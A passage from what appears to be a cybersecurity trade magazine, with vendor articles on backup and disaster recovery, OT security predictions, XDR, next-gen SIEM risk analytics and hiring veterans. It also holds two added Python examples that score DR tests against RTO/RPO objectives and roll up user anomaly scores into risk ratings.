compliance standards, especially if they want to be approved for cyber insurance. Part of a cyber
resilience plan includes policies around data retention and automated backups to guarantee compliance.
Organizations must be prepared to properly store, archive and recover compliance data as a proactive
measure.
A BCDR solution with automated disaster recovery (DR) testing capabilities also helps with meeting
service level agreements (SLAs). It allows organizations to schedule a time and specify the systems that
need to be tested, and then takes care of it automatically. If a test identifies an SLA that cannot be met,
adjustments can be made, and tests run again to check whether the changes worked. This type of testing
protects against unplanned downtime.
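The RTO/RPO definitions in "Terms to Know" and the automated DR test just described, worked through as an added example (not Unitrends' or Spanning's code): each system carries its recovery objectives, a simulated outage is measured against the last completed backup (RPO) and the timed restore (RTO), and any SLA that cannot be met is reported with the adjustment to try before the next run. System names, backup schedules and restore durations are constructed sample data.

```python
"""Evaluate a simulated DR test against per-system RTO and RPO objectives.

Added example; not code from the article, Unitrends or Spanning. Systems,
backup timestamps, the outage time and restore durations are constructed.
"""
from datetime import datetime, timedelta


def data_loss_window(backup_times, outage_at):
    """Worst-case data loss = time between the last completed backup and the outage.

    Returns None when no backup completed before the outage (nothing to restore).
    """
    completed = [t for t in backup_times if t <= outage_at]
    if not completed:
        return None
    return outage_at - max(completed)


def evaluate_dr_test(systems, outage_at):
    """Check each system's RPO (data loss) and RTO (restore time) for one outage.

    systems: list of dicts with keys name, rpo, rto (timedelta),
             backups (list of datetime), restore_duration (timedelta).
    Returns one result dict per system, failures first.
    """
    results = []
    for s in systems:
        loss = data_loss_window(s["backups"], outage_at)
        rpo_met = loss is not None and loss <= s["rpo"]
        rto_met = s["restore_duration"] <= s["rto"]
        adjustments = []
        if loss is None:
            adjustments.append("no backup before outage: verify the backup job runs at all")
        elif not rpo_met:
            # The backup interval must not exceed the RPO, otherwise the gap is too wide.
            adjustments.append(
                f"shorten backup interval to at most {s['rpo']} (measured loss {loss})"
            )
        if not rto_met:
            overrun = s["restore_duration"] - s["rto"]
            adjustments.append(f"restore overran RTO by {overrun}: pre-stage or automate recovery")
        results.append({
            "name": s["name"],
            "rpo_met": rpo_met,
            "rto_met": rto_met,
            "sla_met": rpo_met and rto_met,
            "adjustments": adjustments,
        })
    # Surface the systems that cannot meet their SLA first.
    results.sort(key=lambda r: r["sla_met"])
    return results


def _t(hour, minute=0):
    """Constructed timestamps on a single test day."""
    return datetime(2022, 3, 1, hour, minute)


# Constructed systems: a near-zero-RPO transaction store, a file share, a wiki.
SAMPLE_SYSTEMS = [
    {   # bank-style: cannot afford to lose transactions, but backups only run every 5 minutes
        "name": "payments-db",
        "rpo": timedelta(minutes=1),
        "rto": timedelta(minutes=15),
        "backups": [_t(9, m) for m in range(0, 60, 5)],
        "restore_duration": timedelta(minutes=10),
    },
    {   # four-hourly backups meet RPO, but the restore is slower than the objective
        "name": "file-share",
        "rpo": timedelta(hours=4),
        "rto": timedelta(hours=8),
        "backups": [_t(0), _t(4), _t(8)],
        "restore_duration": timedelta(hours=9),
    },
    {   # daily backup, easily recreated content, generous objectives
        "name": "wiki",
        "rpo": timedelta(hours=24),
        "rto": timedelta(hours=24),
        "backups": [_t(1)],
        "restore_duration": timedelta(hours=1),
    },
]
OUTAGE_AT = _t(9, 32)  # simulated failure at 09:32

if __name__ == "__main__":
    for r in evaluate_dr_test(SAMPLE_SYSTEMS, OUTAGE_AT):
        print(r)
```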
Regardless of where data lives, a unified BCDR solution can help IT professionals reinforce their
organization’s cyber resilience, free up time to focus on more important tasks, adhere to compliance
regulations and ensure SLAs are met.
About the Author
Joe Noonan is the General Manager of Unitrends and Spanning. Joe
has spent over 18 years delivering hardware and software technology
solutions for virtualization, cloud, data protection, and disaster
recovery. He has worked for Unitrends since 2010 driving its software
product strategy for data protection, recovery automation, and cloud
disaster recovery and migration. Joe has also held roles in developing
technology alliances and is now the GM for the backup and DR suite at
Kaseya, which includes Unitrends, Spanning and Kaseya-branded
backup solutions. Joe can be reached at unitrends.com/contact.
3 Cybersecurity Certainties for 2022
By Bill Moore, XONA
As businesses transitioned to hybrid work models in 2021, critical integrations between IT and OT
technologies introduced new vulnerabilities that threat actors exploited with shocking frequency and
effectiveness.
This was especially true for manufacturers, energy producers, and utilities, which increasingly rely on
remote operations capacity to empower distributed teams to engage physical infrastructure from
anywhere in the world. As a result, many organizations experienced an ICS/OT cybersecurity incident in
the past year, costing companies millions of dollars in recovery and opportunity costs.
With everything from ransomware attacks to data breaches becoming more prevalent and impactful, it’s
even more important that those charged with protecting critical infrastructure enhance their defensive
postures to meet the moment. As they reflect on their cyber readiness and plan for the year ahead, here
are three cybersecurity certainties that should guide their decision-making processes.
1. Cybersecurity Incidents Will Become More Expensive
Cybercrime is big business, collectively netting more than $1.5 trillion annually, making it more valuable
than many of the biggest companies in the world. Money is the main motivator for today’s threat actors,
who often view cybercrime as a low-risk, high-reward financial opportunity.
Therefore, companies shouldn’t be surprised that cybersecurity incidents are becoming more expensive.
Most notably, ransomware payments are soaring. In 2018, the average ransomware payment
approached $7,000. By 2020, many companies were paying more than $200,000. This year, the average
ransomware payment increased by 518 percent, a shocking surge reflecting digital infrastructure’s
centrality for many companies' operational continuity.
At the same time, the cost of a data breach reached a record high in 2021, surpassing $4 million for the
first time. With cybersecurity insurance premiums similarly increasing rapidly, companies are left with
little recourse for mitigating the cost of a cybersecurity incident.
While companies may be tempted to rely on previously purchased IT-focused cybersecurity products,
the rising costs of failure are a reminder that investing in an OT-specific cybersecurity solution is an
investment with tremendous returns.
2. Failure to Secure Digital Infrastructure Will Have Real-world Implications
In 2021, cybersecurity failures interfered with manufacturing operations, exposed sensitive data, and
eroded brand reputation. Cybersecurity incidents will have even more heightened real-world implications
that put people at risk in the year ahead.
For example, looking to leverage access to company networks, ransomware gangs are exfiltrating
company data, raising the stakes for victims while increasing their leverage to extract high payouts. This
trend will continue in 2022, compounding the consequences of a cybersecurity incident.
Most importantly, as manufacturers, energy producers, and utilities continue integrating IT and OT
systems, cybersecurity incidents put public safety on the line. A 2021 event in Oldsmar, Florida, where a
threat actor capitalized on an IT vulnerability to access OT capabilities in an attempt to poison the city’s
water supply, is emblematic of the challenges many companies and municipalities face.
This year, cybercriminals demonstrated the capacity to instigate fear, uncertainty, and chaos, causing
long gas lines, production shortages, and close encounters that make it clear that companies need to
prepare for the failure to secure digital infrastructure to have real-world implications in 2022.
3. Threat Actors Will Continue to Evolve
Cybercriminals are agile, always ready to adapt to exploit new vulnerabilities and circumstances to
maximize impact.
For instance, in November 2021, the Federal Bureau of Investigation (FBI) released a memo to
companies completing “time-sensitive financial events,” noting that threat actors are targeting these
organizations with ransomware attacks, looking to capitalize on the high-stakes, urgent nature of their
work to extract timely payments.
It’s likely that cybercriminals will look to exploit manufacturers, energy producers, and utilities in the same
way. However, this tactical adjustment is a reminder that threat actors are continually evolving, and
companies need to change too.
Especially as companies continue to adopt experimental workplace arrangements, they need to be more
mindful than ever of the ways these changes expose their digital infrastructure to evolving threat trends.
Cybersecurity Risks May Be Likely, But the Prepared Are More Likely to Succeed
Effective cybersecurity practices don’t happen by accident. They are the result of careful assessments,
intentional planning, and successful implementation.
The past year was uniquely challenging as threat actors too often gained the upper hand, exploiting new
vulnerabilities in IT and OT integrations to wreak havoc among critical infrastructure. Their continued
success isn’t inevitable, making today the right time to prepare for tomorrow’s challenges.
About the Author
Bill Moore is the CEO and Founder of XONA, provider of a unique
“zero-trust” user access platform especially tailored for remote
Operational Technology (OT) sites. Bill is currently working with
global power, oil and gas, and manufacturing customers to reduce
their remote operations costs and cyber risks. Bill brings more
than 20 years’ experience in security and the high-tech industry,
including positions in sales, marketing, engineering and
operations.
Is XDR The Right Solution for Today’s Security Threats?
Defining XDR’s Role in the Security Stack
By Steve Garrison, VP Marketing, Stellar Cyber
XDR and Open XDR are two of the latest buzzwords in the cybersecurity tools market, but there are many
definitions of XDR and several approaches to delivering it. Let’s clear the air a little.
In general, cybersecurity products use preventive physical and software measures to protect the network
and its assets from unauthorized access, modification, destruction, and misuse. These products typically
protect specific assets on the network:
• Firewalls: prevent unauthorized users from accessing the network by allowing or denying traffic.
• Anti-Virus/Malware software: protects network endpoints and servers from becoming infected
by damaging software that can corrupt files, export sensitive data, or perform other malicious
activities.
• Application Security: systems look for and block vulnerability points in application software.
• Network Access Control: systems manage access permissions for authorized users and
devices, preventing unauthorized users from gaining access.
• User Behavior Analytics: solutions monitor user activity, baseline normal behavior, and alert on
activities that deviate from normal activity.
• Network Traffic Analysis: Network Detection and Response (NTA/NDR) products analyze
network traffic, look for abnormal patterns that can indicate attacks, and act based on the results.
Network traffic does not lie and contains strategic data for threat detection.
• Cloud Security: solutions protect resources in the cloud.
• Intrusion Prevention Systems (IPS): monitor for and block attacks from outside users or
processes that get past the firewall.
• Security Information and Event Management (SIEM): SIEM products collect data from various
device logs on the network and can monitor for anomalies. Traffic-based NTA/NDR products
complement SIEMs by analyzing logs and acting. In fact, NTA/NDR is critical to advancing
visibility beyond logs.
As you can see, there’s a lot to protect in a network, and a lot of approaches to protecting it. But rather
than having a dozen or more point solutions (each with its own interface console) to manage, wouldn’t it
be easier, faster, and more efficient to have just one? That’s where XDR / Open XDR comes in.
Definitions of XDR
Initial definitions of XDR – eXtended or Everything Detection and Response – envisioned it as a single
platform that unifies detection and response across the entire security kill chain. The idea is that instead
of manning a dozen or more separate security consoles to monitor and protect the network, XDR unifies
the telemetry from those tools and presents it in a single dashboard. The more advanced products not
only unify the data, but also correlate and analyze it automatically to present a prioritized list of threats
with recommendations about how to neutralize them.
So how does the market define XDR, specifically? That depends on who you ask. According to Rik
Turner, a lead analyst at Omdia who coined the XDR acronym, XDR is “a single, stand-alone solution
that offers integrated threat detection and response capabilities.” To meet Omdia’s criteria to be classified
as a “comprehensive” XDR solution, a product must offer threat detection and response functionality
across endpoints, networks, and cloud computing environments.
Gartner’s definition is similar in that it points to features such as alert and incident correlation, built-in
automation, multiple streams of telemetry, multiple forms of detections (built-in detections), and multiple
methods of response. However, Gartner requires XDR to be achieved through consolidating multiple
proprietary, vendor-specific security products.
Forrester’s definition of XDR requires the platform to be anchored around an EDR. It defines Native XDR
as EDR integrating with a vendor’s own security tools; Hybrid XDR as EDR integrating with third-party
security tools; a SAP (Security Analytics Platform) as a platform without built-in EDR, but with built-in
NAV and SOAR with third-party integrations; and SSA (Standalone Security Analytics) as those platforms
that rely solely on third-party tools for telemetry sources and responses.
Open XDR
Open XDR was initially created by Stellar Cyber with the same features Gartner mentions, except that
not all the security products/components have to be from the same vendor. Instead, the platform is open
and integrates with third-party security tools. Some components are built-in, and others are added
through deep third-party integrations.
The Open XDR moniker was later picked up by vendors who purely rely on a wide ecosystem of third-party
tools for telemetry sources and response, but who don’t offer any built-in components.
How Open XDR Helps
Open XDR addresses a key reality in organizational cybersecurity infrastructures, which is that
companies have already invested heavily in security tools, and they don’t want to have to abandon those
investments to adopt XDR. Rather, Open XDR allows companies to leverage these existing investments
while making them more valuable by automatically correlating their data with data from other tools and
sensors.
In addition, the more advanced Open XDR platforms leverage AI and machine learning to cut down on
analysts’ “alert fatigue.” Instead of managing thousands of alerts from a dozen or more tools, XDR
combines related alerts into higher-level incidents and automatically dismisses many alerts based on
what it “learns” to be normal behavior in any given environment.
Given the rising tide of cybersecurity attacks affecting every type of organization, combined with a global
shortage of cybersecurity analysts and high analyst turnover rates and burnout, any solution that
improves protection along with analyst productivity is welcome indeed. That’s the real promise of XDR.
About the Author
Steve can be reached online at sgarrison@stellarcyber.ai and at our
company website http://stellarcyber.ai.
Why the Future of Threat Detection and Prevention is
Unified Security and Risk Analytics
Why True AI/ML Capabilities are Essential for Next-Gen Risk Analytics
By Sanjay Raja, VP of Product Marketing at Gurucul
As cloud adoption continues to grow and remote work becomes the new normal, security teams are
facing increased challenges with decreased visibility and a larger influx of security event data. As
ransomware attacks continue to rise (recent SonicWall data showed a 148% increase through Q3’21),
SecOps teams are struggling to identify attacks before damage is done. As a result, they’re chasing
solutions that accelerate detection and response, while increasing operational efficiencies.
Unfortunately, in many cases vendor claims have delivered only minimal improvements that do not keep
pace with today’s threat actors. Traditional SIEMs and endpoint-focused XDR are not fulfilling the
promise of reducing the burden on understaffed security teams. The volume of alerts and false positives
makes it an uphill battle. For organizations wanting to reduce cyber risk across the on-prem, cloud, and
remote infrastructures commonly supported today, security teams need to leverage unified data
collection, a multitude of analytics, non-rule-based Machine Learning (ML) and Artificial Intelligence (AI),
consolidated investigation interfaces, and targeted automation for faster response.
A very small set of next-gen SIEM solutions are innovating through more unified security and risk
analytics capabilities that are crucial for success today. In this article, I’d like to explore why the future of
threat detection and response is stemming from these new advancements.
SIEM was initially designed primarily for log collection and storage for compliance, then evolved to include
the correlation of more log data sources for threat detection. Over time that functionality increased to
integrate log, network, and endpoint data into a single location and match it up with security events. This
helped analysts investigate commonalities or groups of related events. And as rules were developed
around these related events, the SIEM could help to detect known threats.
Then came the rise of the terms like Machine Learning and Artificial Intelligence (ML/AI) – offering the
promise of a silver bullet to solve threat detection and response. However, these terms were commonly
misused and in reality were just rule-based analytics engines that would conditionally gather more data
for greater context. However, as attackers stayed hidden inside the network longer, rule-based analytics
often failed to correlate seemingly disparate events across time and continued to focus on known attacks.
As a result, new, unknown, and emerging attacks and variants were easily able to avoid detection.
Furthermore, SIEMs were also traditionally plagued by a lack of cloud-native offerings built to
handle both cloud and hybrid infrastructures equally.
Today, newer advancements in SIEM are focused on several areas designed to make it the primary
platform for the security operations center (SOC). This includes security monitoring, improved threat
detection, and playbooks to drive faster response. Many EDR, XDR and SIEM solutions that claim to use
ML/AI continue to use rule-based engines with finite models, patterns and signatures that are not updated
fast enough when new attacks are discovered.
However, there are next-gen SIEM solutions incorporating unified security and risk analytics that are
taking the extra step to deliver out-of-the-box advanced data modeling across cloud, user, network, asset,
endpoint, and log telemetry. The few that offer true ML/AI can automatically detect new, unknown, and
emerging attacks, including subtle variants. Along with an understanding of user access and entitlements,
behavioral modeling, and risk metrics, the end goal of next generation SIEM is to streamline every facet
of the SOC. This includes reducing noise and false positives, prioritizing which IoCs need to be
investigated, consolidating data for easier investigations, and providing a high confidence, low-risk
automated response to prevent a successful attack.
What does that mean? Let’s look at the key elements of unified security and risk analytics in a next-generation
SIEM.
• Unified Correlation, Continuous Risk Profiling and Behavioral Anomaly Detection – A next-generation
SIEM must unify data collection across the entire infrastructure, on-prem, cloud and
remote, by gathering endpoint, log, user, access, entity/asset, network, and other data to provide
greater context. With risk profiling applied to abnormal behaviors, a behavior-based risk can be
calculated to elevate which events are truly relevant for investigation, or can even be used to
determine an immediate threat with conviction. This shrinks the noise created by false positives
and provides more context to enable a much more targeted response, ideally before an attack
campaign starts to establish itself.
• Identity and Access Analytics – Next-gen SIEM uses Identity Analytics (IdA), leveraging data
science to monitor for and identify risky access controls, entitlements, user behaviors, and
associated abnormal or deviant activity. These advanced analytics can also serve as key
indicators for provisioning, de-provisioning, authentication, and privileged access
management by IAM teams. IdA surpasses human capabilities by leveraging machine learning
models to define, review and confirm accounts and entitlements for access, and works with risk
analytics to prioritize the most suspicious activity as likely malicious.
• Cross-Channel Fraud Prevention – Next-gen SIEM offers modern fraud detection capabilities with
the ability to link data from a multitude of sources to provide a contextual view of what’s happening
in the environment. Such platforms highlight anomalous transactions based on historic user and
community profiles so analysts can initiate investigations or execute automated remediation
actions. They analyze online and offline activity, including public records, contact center interactions,
point of sale transactions, ATM transactions, and more. They mine and normalize data and then
create a risk score for fraud and abuse that can be used for real-time decision making.
The ability to combine these elements to best suit the needs of an organization offers SecOps power and
flexibility when protecting users and the business from data exfiltration, cyber fraud, privileged access
abuse, account compromise and more – using behavior and context. As a result, teams can prioritize
risks and alerts, quickly investigate problems, automate risk response, have a comprehensive view of
case management, conduct contextual natural language search and more, all consolidated into a single
management console.
As the consolidation of security capabilities continues, providers are working to layer on more capabilities
to further unify security, including UEBA, SOAR and XDR. They’re also working to provide better security
and to lower capital and operational requirements, including scaling, training, management, and
maintenance. In addition, security operations teams have long invested in and focused on external
threats. This has led to a lack of monitoring for insider threats. As part of the foundation of a successful
security program, teams must monitor for both external and internal threats. And a mature UEBA set of
capabilities should be incorporated to fully protect the organization.
What questions should you be asking today about your SIEM, or of your SIEM provider?
• How is the SIEM platform delivered? The ability to run as a collection of services entirely within
the cloud makes it ideal for risk analysis of security data. Organizations have the advantage of
aggregating and analyzing data from worldwide sources in a single application instance. These
platforms must also scale (both up and down) to accommodate varying workloads. Furthermore,
a cloud-native solution is often easier to maintain over time since the vendor can perform
upgrades quickly, and in real-time.
• Do they offer open analytics and allow teams to easily modify and build custom ML models?
Open analytics are critical for security teams to be able to customize their ML models to suit their
specific needs or build their own models. It’s important to understand exactly what goes into a
model to be confident in its output. With black box analytics, results must be taken on faith since
nobody knows how the answers are obtained, or if the results are valid.
• What are my options for a data lake? Where and how data is stored is a critical factor in the flexibility,
speed, quality, and cost of security data processing, ingestion, and storage. An open choice of big
data platform offers major economic advantages over traditional data warehouses for scaling to terabytes
or petabytes. It’s imperative that a SIEM platform works with what you already have or plan to
purchase versus being locked into a proprietary vendor data lake.
• What does the risk modeling approach look like? Look for a platform that offers self-learning, self-training,
and contextually aware algorithms that score every transaction as it is evaluated in
near real time. This requires a comprehensive risk engine that performs continuous risk scoring
and can provide real time risk prioritized alerts for incident analysis. The risk scoring framework
needs to roll up risk scores from multiple contributing elements (with the ability to deliver
normalized user and entity risk scores). As a result, a finite number of targeted response actions
can be defined, driven by high-fidelity automation, thereby accelerating threat response.
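Added illustration (not the author's or Gurucul's code) of the risk rollup described in the Unified Correlation bullet and in the risk modeling question above: constructed telemetry from four sources is scored per user against a behavioral baseline, rolled up into one normalized user risk score, and ranked, with the contributing factors kept so the output is explainable. The weights, threshold and sample data are hypothetical.

```python
"""Unified risk rollup across telemetry sources (constructed example).

Per-user baselines from endpoint, log, identity/access and network telemetry
are compared with the current observation window; each source yields an
anomaly score, and the scores are rolled up into one normalized 0-100 user
risk score that decides what an analyst sees first.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed telemetry: seven days of per-day counts per (user, feature).
BASELINES = {
    ("alice", "endpoint:process_launches"):  [40, 45, 42, 44, 41, 43, 44],
    ("alice", "log:failed_logins"):          [0, 1, 0, 0, 1, 0, 0],
    ("alice", "access:entitlement_changes"): [0, 0, 0, 0, 0, 0, 0],
    ("alice", "network:bytes_out_mb"):       [120, 110, 130, 125, 115, 118, 122],
    ("bob", "endpoint:process_launches"):    [30, 35, 32, 31, 33, 34, 30],
    ("bob", "log:failed_logins"):            [0, 0, 1, 0, 0, 0, 0],
    ("bob", "access:entitlement_changes"):   [0, 0, 0, 0, 1, 0, 0],
    ("bob", "network:bytes_out_mb"):         [90, 95, 88, 92, 91, 94, 90],
}
# Constructed current window: alice is normal; bob shows a burst of failed
# logins, new entitlements and a large outbound transfer.
TODAY = {
    ("alice", "endpoint:process_launches"): 43,
    ("alice", "log:failed_logins"): 1,
    ("alice", "access:entitlement_changes"): 0,
    ("alice", "network:bytes_out_mb"): 119,
    ("bob", "endpoint:process_launches"): 33,
    ("bob", "log:failed_logins"): 25,
    ("bob", "access:entitlement_changes"): 3,
    ("bob", "network:bytes_out_mb"): 2600,
}
# Hypothetical weights: each source's share of the rolled-up user risk.
# They sum to 1 so the result stays on a 0-100 scale.
SOURCE_WEIGHTS = {"endpoint": 0.2, "log": 0.25, "access": 0.3, "network": 0.25}


def anomaly_score(history, observed, cap=6.0):
    """0-1 anomaly score: standard deviations above the baseline mean,
    saturating at `cap` sigma. Only increases count as risky here."""
    mu, sigma = mean(history), pstdev(history)
    sigma = max(sigma, 0.5)  # floor so an all-zero baseline cannot divide by zero
    z = max(0.0, (observed - mu) / sigma)
    return min(z, cap) / cap


def rollup_user_risk(baselines, today, weights=SOURCE_WEIGHTS):
    """Roll per-source anomaly scores up into one normalized 0-100 risk score
    per user, keeping the contributors so the analyst can see what went in."""
    per_user = defaultdict(dict)
    for (user, feature), observed in today.items():
        source = feature.split(":", 1)[0]
        score = anomaly_score(baselines[(user, feature)], observed)
        # keep the worst anomaly seen for each source
        per_user[user][source] = max(per_user[user].get(source, 0.0), score)
    results = {}
    for user, by_source in per_user.items():
        total = sum(weights[src] * s for src, s in by_source.items())
        contributors = sorted(by_source.items(), key=lambda kv: -kv[1])
        results[user] = {
            "risk": round(100 * total, 1),
            "contributors": [(s, round(v, 2)) for s, v in contributors if v > 0],
        }
    return results


def prioritise(results, threshold=50.0):
    """Users ordered by rolled-up risk, dropping those below the alerting
    threshold: the score, not the raw alert count, decides what surfaces."""
    ranked = sorted(results.items(), key=lambda kv: -kv[1]["risk"])
    return [(user, r["risk"]) for user, r in ranked if r["risk"] >= threshold]


if __name__ == "__main__":
    res = rollup_user_risk(BASELINES, TODAY)
    for user, r in res.items():
        print(user, r["risk"], r["contributors"])
    print("prioritised:", prioritise(res))
```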
SIEM is not just about ingesting data sources. To empower security teams these solutions must deliver
a variety of capabilities. This includes providing actionable context of the ingested data, reducing noise,
and identifying and prioritizing the right events associated with an attack. It also means delivering highly
accurate and targeted investigation capabilities with confirmation of the attack and high-confidence
automated responses. Finally, these solutions need to thwart the successful detonation of ransomware
or the execution of the main attack purpose (corruption, disruption, or theft).
A next-generation SIEM with unified security and risk analytics should be the core of a successful security
operations program. Security teams must evaluate innovative technologies that continue to improve and
consolidate analytical capabilities to provide a more usable platform that also improves the ROI of the
SOC program.
About the Author
Sanjay Raja brings over 20 years of experience in building, marketing
and selling cyber security and networking solutions to enterprises,
medium-to-small business, and managed service providers.
Previously, Sanjay was VP of Marketing at Prevailion, a cyber
intelligence startup. Sanjay has also held several successful leadership
roles in Marketing, Product Strategy, Alliances and Engineering at
Digital Defense (acquired by Help Systems), Lumeta (acquired by
Firemon), RSA (Netwitness), Cisco Systems, HP Enterprise
Security, Crossbeam Systems, Arbor Networks, Top Layer
Networks, Caw Networks (acquired by Spirent Communications),
Nexsi Systems, 3Com, and Cabletron Systems. Sanjay holds a
B.S.EE and an MBA from Worcester Polytechnic Institute.
Sanjay can be reached online at our company website https://gurucul.com
Tips And Trends for OT Cybersecurity In 2022: More
SOAR, Cyber Hygiene And Renewed Compliance
By Peter Lund, Vice President of Product Management at OT security company Industrial
Defender
As of February 2022, we’re already witnessing an increased focus on OT cybersecurity — and for good
reason. The Biden Administration has announced a new plan to secure U.S. water systems from
cyberattacks, an unfortunate signal that bad actors are targeting utilities and threatening what Americans
typically view as guarantees. Water, gas, and electricity are all at risk of being contaminated, interfered
with, or even halted, as was the case with the Colonial Pipeline ransomware attack.
Despite the imminent threats, I predict the below trends will help security professionals protect OT
systems this year:
Reinforcing today’s standards of security
In 2022, we’ll see traditional managed security service providers offer OT services to stay at the forefront
of the industry. This trend is already apparent with Deloitte's recent acquisition of OT security provider
aeSolutions.
Additionally, we’ll witness the return to basic hygiene and reliance on preventative controls over threat
intelligence. Threat intelligence is a go-to strategy for many in the industry. However, knowing what bad
actors exist has little benefit for enterprises if they don't know if the doors and windows (firewalls and
remote access) of their organization are locked. I would go as far as saying that many organizations still
don't know how many doors and windows they have. Taking a step back, 2022 will welcome a renewed
focus on basic hygiene.
Introducing OT cybersecurity's 2022 innovations
Security Orchestration, Automation and Response (SOAR) is standard practice in IT. As the year
continues onward, we'll see more OT cybersecurity experts lean on these guidelines within their own
practice.
Additionally, OT passive monitoring solutions will need to expand active data collection capabilities. Many
enterprises rely on outdated monitoring solutions that don't account for real-time data collection. To better
manage OT assets, it will be crucial to expand data collection capabilities.
Finally, Software Bills of Materials (SBOMs) will remain trendy, but adoption will lag because of OEMs. If
the ongoing log4j vulnerability saga has taught us anything, it’s that SBOMs are not optional.
Unfortunately, until we get buy-in from the major OEMs that supply the hardware and software that keep
the lights on, customers and security vendors will be behind the eight-ball when it comes to data accuracy
and integrity. Hopefully log4j will be a catalyst to get the industry to agree on a standard for publishing
and sharing SBOM data.
Focusing on the big picture
As alternative energy sources gain prominence, we'll see an increased focus on OT security for
renewable energy sources. By and large, renewables have been able to fly under the radar when it comes
to regulations like NERC as well. As we become more and more reliant on renewables, we need to ensure
that they are protected, hopefully before a catastrophic event causes a widespread outage.
As more industries work to stay compliant, the U.S. government will simultaneously double down on the
NIST Cybersecurity Framework for standard cybersecurity controls. In 2022, we can expect NIST to
continue to provide additional updates and recommendations as it aims to standardize cybersecurity
controls. The NIST Cybersecurity Framework is essential for enterprises looking to check their
cybersecurity boxes.
What’s next?
Organizations have reason to be wary of cyberattacks in 2022, but security professionals can breathe a
sigh of relief when tackling the year with a strategic, three-pronged approach. Enterprises must revisit
basic hygiene measures, adopt the latest and greatest tools to stay protected, and remain focused on
the big picture of what’s going on across the United States and in the industry as a whole. Bad actors are
out to cause disruption, but organizations can stay protected with these tips and trends in mind.
About the Author
Peter has a strong technical and business background with over 15
years of experience working with and for IT and OT product companies.
Over the last five years, Peter was instrumental in bringing new features
to the market for Industrial Defender. In addition to his product
management role, he utilizes a wide range of experience in application
development, systems engineering and marketing. Prior to working with
Industrial Defender, Peter held roles at Dell EMC, Schneider Electric
and KVH Industries.
Top 10 Reasons Cyber Defense Firms Should Hire
Veterans
Technology expert and former military intelligence officer shares insight on the valuable skills
that veterans can bring to the cybersecurity industry
By Bryon Kroger, Founder of Rise8
Following the onset of the global pandemic, the number of data records compromised by cyberattacks
more than doubled from the year prior, from some 15,432 in 2019 to over 37,000 in 2020. Last year, in
2021, malicious cyberattacks remained a present threat as hackers attacked the Colonial Pipeline with
ransomware, and CISA director Jen Easterly noted a massive flaw in Apache’s Log4j logging library that
potentially left hundreds of millions of user devices vulnerable.
Unfortunately, as the real and present threat of additional attacks and vulnerabilities continues to
increase, and the technology used in successful attacks and data breaches becomes more sophisticated,
the cybersecurity industry remains heavily understaffed. According to the National Initiative for
Cybersecurity Education, the global shortage of qualified cybersecurity personnel is approaching nearly
3 million.
With such a massive shortage of workers, cybersecurity leaders and professionals should look to hire
one sector of the US workforce where applicants are not only in high demand, but also where many are
already certified or qualified in cybersecurity—veterans. In this article, I will list my top 10 reasons and
explain why firms should hire veterans to address critical gaps in their workforce and cybersecurity
defenses.
1. Veterans are accustomed to the responsibilities of leadership
Whether it’s the lessons learned from the first week of boot camp, the first night of a field operation, or
the morning before giving a briefing, military service trains veterans from day 1 to understand the
importance of leadership. In the realm of cybersecurity, it is often the quality of leaders that determines
a firm’s ability to react and respond to potential threats (or present ones) in a timely manner. In the
military, strong leadership could spell the difference between life or death. For cybersecurity firms, hiring
veterans with leadership experience could spell the difference between overcoming and blocking a
distinct threat, or allowing it to breach their (or their clients’) private data.
2. Most Vets are comfortable in fast-paced environments
If there is one word that sums up the active-duty lifestyle, it’s “intensity.” During their time in the military,
veterans learn how to adapt to and become comfortable with ever-changing fast-paced environments,
often with the high-stakes factor of civilians involved as some form of collateral. In cyber defense, the
high-stakes game transitions to one of veterans protecting themselves, their team, as well as civilians
from malicious digital attacks. As such, veterans are already able to place themselves in a mindset that
makes them a prime candidate for the cyber defense industry. Additionally, veterans may be better adept
at navigating their peers through potential cyber crises and emerging victorious once a threat is
addressed and nullified.
3. Veterans value and respect constructive feedback
In many field operations during their time in active duty service, one luxury many veterans are not able
to find is the ability to try again if their operation results in failure. However, trial and error is at the
foundation of cyber defense; being able to learn what a threat is as well as how to best assess it and
work around it is at the core of cybersecurity. Knowing this, many veterans in the cyber defense industry
will find their mentors and/or leaders offering constructive feedback and criticism of their performance,
spurring them to do better next time against the next inevitable threat, regardless of when or where it
occurs.
4. Teamwork and individual responsibility is at the heart of military training
The ability to get the job done no matter what, whether individually or as part of a team, is a mindset
almost every veteran is trained to possess. As a result, veterans inherently hold stronger feelings of
personal accountability and accomplishment regarding the success of their mission. Being able to
operate as an individual professional that is part of a team equipped to handle outside threats — in which
each individual is accountable for specific metrics of success — is at the heart of both military and cyber
defense training. In the event that a cyber defense firm faces a crisis, veterans are one demographic of
employees best apt to help that firm navigate the intricacies of such an occurrence.
5. Veterans find purpose in delivering meaningful results
Along with teamwork and leadership, the mindset of completing a mission no matter what also helps
drive veterans towards delivering the impactful results that their service provides others. In the realm of
cybersecurity and cyber defense, those results could mean the difference between a firm’s longevity and
continued success or its failure if it faces a substantial digital threat. Veterans in the industry are able to
clearly understand how their performance directly impacts not only their team, leaders, and others around
them, but also outside individuals with a stake in the success of their mission. Having this results-oriented
mindset is what helps make veterans such valuable workers to the cyber defense firms that employ them.
6. Vets are mission driven
Whenever an active-duty veteran is instructed on what their mission means for the bigger picture, it helps
instill a sense of purpose. For veterans in cyber defense and cybersecurity, that purpose is derived from
the additional layers of digital protection their work and expertise provide others. When a veteran in cyber
defense understands their purpose is to uphold the integrity of private data and information, they dedicate
themselves to upholding that purpose, providing the firms who employ them and their clients with
additional means of protecting their data, which provides over-arching value to the cyber defense industry
as a whole.
7. Dependability is vital both in military and cybersecurity service
Veterans are taught to understand that any individual or service — no matter how vital — is only as
valuable as it is dependable; including themselves. For instance, if a core technology a veteran relies on
to conduct their daily tasks becomes unreliable, or a newer/better technology emerges, veterans are
taught to seek out the reliability and value it could bring to their service. Likewise, dependability is crucial
to the ongoing success of firms within the cyber defense industry, as their services rely upon an ability to
protect and bolster the defenses of vulnerable users and data.
8. Vets understand the importance of structure and clarity
Without a clearly defined structure, no organization will be able to achieve success or maintain that
success in the long run. Structure, however, is one of the core building blocks that military service helps
instill in veterans, and many veterans seek out that structure in the private sector after their military
service formally concludes. Therefore, many veterans will find themselves thriving in a role at a cyber
defense firm that offers them a similar sense of structure, as well as clarity regarding their purpose within
the organization. Through finding these, veterans are inherently able to rely upon their military training to
continue providing value to the firms they work for.
9. Vets are focused on the impact of driving meaningful change
If you ask a room full of veterans why they initially decided to join the military, most of the responses you
receive are bound to fall along the lines of their desire to be a part of meaningful, positive change in the
world. That meaningful change is precisely what the cybersecurity industry seeks to provide its clients in
